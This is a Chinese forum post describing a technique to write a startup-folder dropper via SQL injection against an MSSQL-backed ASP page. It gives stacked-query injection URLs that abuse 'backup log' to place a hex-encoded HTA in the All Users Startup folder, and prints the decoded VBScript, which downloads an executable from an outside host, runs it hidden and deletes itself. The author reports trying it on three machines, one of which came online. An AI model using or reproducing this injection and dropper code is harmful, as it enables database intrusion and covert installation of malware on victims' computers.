|
MSSQL备份到启动项(这个很强大)
http://192.168.1.23/test.asp?id=0;alter database dbname set recovery full;create table temp(aa sql_variant primary key)--
Copy code http://192.168.1.23/test.asp?id=0;declare @a varchar(255);set @a=0x433A5C57494E444F57535C54656D705C7E3039383631312E746D70;backup log dbname to [email=disk=@a]disk=@a[/email] with init--
Copy code http://192.168.1.23/test.asp?id=0;insert into temp values (0x3C736372697074206C616E67756167653D225642536372697074223E0D0A77696E646F772E6D6F7665546F20383838382C383838380D0A753D22687474703A2F2F3139322E3136382E312E32332F746573742E6578652 20D0A703D226D2E657865220D0A53657420783D4372656174654F626A65637428224D6963726F736F66742E584D4C4854545022290D0A782E4F70656E22474554222C752C300D0A782E53656E6428290D0A53657420733D4 372656174654F626A656374282241444F44422E53747265616D22290D0A732E4D6F64653D330D0A732E547970653D310D0A732E4F70656E28290D0A732E577269746528782E726573706F6E7365426F6479290D0A732E536 17665546F46696C6520702C320D0A53657420773D4372656174654F626A6563742822577363726970742E5368656C6C22290D0A772E52756E20702C300D0A772E52756E22636D64202F632064656C20612E687461222C300 D0A77696E646F772E726573697A65546F20302C300D0A77696E646F772E636C6F73650D0A3C2F7363726970743E)--
Copy code http://192.168.1.23/test.asp?id=0;declare @a varchar(255);set @a=0x433A5C446F63756D656E747320616E642053657474696E67735C416C6C2055736572735CA1B8BFAACABCA1B9B2CBB5A55CB3CCD0F25CC6F4B6AF5C612E687461;backup log dbname to [email=disk=@a]disk=@a[/email]--
其中Copy code0x3C736372697074206C616E67756167653D225642536372697074223E0D0A77696E646F772E6D6F7665546F20383838382C383838380D0A753D22687474703A2F2F3139322E3136382E312E32332F746573742E6578 65220D0A703D226D2E657865220D0A53657420783D4372656174654F626A65637428224D6963726F736F66742E584D4C4854545022290D0A782E4F70656E22474554222C752C300D0A782E53656E6428290D0A5365742073 3D4372656174654F626A656374282241444F44422E53747265616D22290D0A732E4D6F64653D330D0A732E547970653D310D0A732E4F70656E28290D0A732E577269746528782E726573706F6E7365426F6479290D0A732E 53617665546F46696C6520702C320D0A53657420773D4372656174654F626A6563742822577363726970742E5368656C6C22290D0A772E52756E20702C300D0A772E52756E22636D64202F632064656C20612E687461222C 300D0A77696E646F772E726573697A65546F20302C300D0A77696E646F772E636C6F73650D0A3C2F7363726970743E
是
Copy code
<script language="VBScript">
window.moveTo 8888,8888
u="http://192.168.1.23/test.exe"
p="m.exe"
Set x=CreateObject("Microsoft.XMLHTTP")
x.Open"GET",u,0
x.Send()
Set s=CreateObject("ADODB.Stream")
s.Mode=3
s.Type=1
s.Open()
s.Write(x.responseBody)
s.SaveToFile p,2
Set w=CreateObject("Wscript.Shell")
w.Run p,0
w.Run"cmd /c del a.hta",0
window.resizeTo 0,0
window.close
</script>
的16进制
这里面自删除貌似还有点问题,有时候删不掉,不管了就这样吧
个人认为这段比网上流传的语句成功率要高一些。
实验结果:前几天一共备份3台机器,有一台确定备份进去了,有一台确定没有备份进去,还
有台列不了目录,不知道进去木有,结果前天,确定备份进去那台机器上线鸟成功率还是不错的 |
|